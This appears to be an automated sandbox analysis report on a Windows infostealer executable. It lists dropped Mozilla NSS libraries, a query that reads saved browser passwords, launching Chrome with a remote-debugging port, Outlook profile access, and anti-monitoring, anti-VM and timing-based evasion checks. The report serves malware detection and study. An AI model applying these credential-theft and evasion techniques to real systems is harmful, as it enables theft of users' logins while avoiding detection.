Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5F1CE0	0_2_6C5F1CE0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C649CB0	0_2_6C649CB0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CFC80	0_2_6C5CFC80
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C593D00	0_2_6C593D00
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C601DC0	0_2_6C601DC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C523D80	0_2_6C523D80
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C679D90	0_2_6C679D90
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6B5E60	0_2_6C6B5E60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C68BE70	0_2_6C68BE70
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C63FE40	0_2_6C63FE40
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C63DE10	0_2_6C63DE10
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C553EC0	0_2_6C553EC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C687F20	0_2_6C687F20
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C633F30	0_2_6C633F30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C525F30	0_2_6C525F30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C565F20	0_2_6C565F20
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C64DFC0	0_2_6C64DFC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6B3FC0	0_2_6C6B3FC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5DBFF0	0_2_6C5DBFF0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C551F90	0_2_6C551F90
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C603840	0_2_6C603840
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C58D810	0_2_6C58D810
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60F8F0	0_2_6C60F8F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C68B8F0	0_2_6C68B8F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CF8C0	0_2_6C5CF8C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C53D8E0	0_2_6C53D8E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5638E0	0_2_6C5638E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5AF960	0_2_6C5AF960
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5ED960	0_2_6C5ED960
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C67F900	0_2_6C67F900
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E5920	0_2_6C5E5920
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5699D0	0_2_6C5699D0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C99C0	0_2_6C5C99C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5959F0	0_2_6C5959F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C79F0	0_2_6C5C79F0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C541980	0_2_6C541980

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C6BDAE0 appears 63 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C559B10 appears 86 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C6B09D0 appears 278 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C553620 appears 74 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C6BD930 appears 51 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C58C5E0 appears 35 times
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: String function: 6C669F30 appears 33 times

Source: 0vsAIy0DhJ.exe, 00000000.00000002.2016019504.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs 0vsAIy0DhJ.exe
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2015727723.000000006C705000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs 0vsAIy0DhJ.exe

Source: 0vsAIy0DhJ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0vsAIy0DhJ.exe

Static PE information: Section: ncgncztn ZLIB complexity 0.9949645623473748

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/36@6/7

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C590300

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8QHLVUSM.htm

Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 0vsAIy0DhJ.exe, 00000000.00000003.1840969003.0000000005855000.00000004.00000020.00020000.00000000.sdmp, HIJJDGDHDGDAKFIECFIJ.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 0vsAIy0DhJ.exe	ReversingLabs: Detection: 65%
Source: 0vsAIy0DhJ.exe	Virustotal: Detection: 63%

Source: 0vsAIy0DhJ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0vsAIy0DhJ.exe	String found in binary or memory: -AdD+gL

Source: unknown	Process created: C:\Users\user\Desktop\0vsAIy0DhJ.exe "C:\Users\user\Desktop\0vsAIy0DhJ.exe"
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2160,i,1634129405105479003,15236246413488024638,262144 /prefetch:8
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2160,i,1634129405105479003,15236246413488024638,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 0vsAIy0DhJ.exe

Static file information: File size 1785344 > 1048576

Source: 0vsAIy0DhJ.exe

Static PE information: Raw size of ncgncztn is bigger than: 0x100000 < 0x199800

Source:	Binary string: mozglue.pdbP source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Unpacked PE file: 0.2.0vsAIy0DhJ.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ncgncztn:EW;uazdyszd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ncgncztn:EW;uazdyszd:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 0vsAIy0DhJ.exe

Static PE information: real checksum: 0x1b8b32 should be: 0x1bb150

Source: 0vsAIy0DhJ.exe	Static PE information: section name:
Source: 0vsAIy0DhJ.exe	Static PE information: section name: .idata
Source: 0vsAIy0DhJ.exe	Static PE information: section name:
Source: 0vsAIy0DhJ.exe	Static PE information: section name: ncgncztn
Source: 0vsAIy0DhJ.exe	Static PE information: section name: uazdyszd
Source: 0vsAIy0DhJ.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: 0vsAIy0DhJ.exe

Static PE information: section name: ncgncztn entropy: 7.953603443473185

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 760186 second address: 76018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 76018C second address: 75F9E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cmc 0x0000000c push dword ptr [ebp+122D0A81h] 0x00000012 jmp 00007EFD88B5ADBFh 0x00000017 call dword ptr [ebp+122D2451h] 0x0000001d pushad 0x0000001e cmc 0x0000001f xor eax, eax 0x00000021 sub dword ptr [ebp+122D2D61h], esi 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b stc 0x0000002c mov dword ptr [ebp+122D37C9h], eax 0x00000032 js 00007EFD88B5ADC4h 0x00000038 mov esi, 0000003Ch 0x0000003d add dword ptr [ebp+122D2D61h], edi 0x00000043 stc 0x00000044 add esi, dword ptr [esp+24h] 0x00000048 js 00007EFD88B5ADBCh 0x0000004e mov dword ptr [ebp+122D2D61h], ecx 0x00000054 lodsw 0x00000056 jmp 00007EFD88B5ADC1h 0x0000005b add eax, dword ptr [esp+24h] 0x0000005f jmp 00007EFD88B5ADC0h 0x00000064 jmp 00007EFD88B5ADC0h 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d jmp 00007EFD88B5ADC7h 0x00000072 nop 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push edi 0x00000077 pop edi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D50D4 second address: 8D50D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D50D8 second address: 8D50E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD88B5ADB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D50E8 second address: 8D50EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8D84F8 second address: 8D84FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
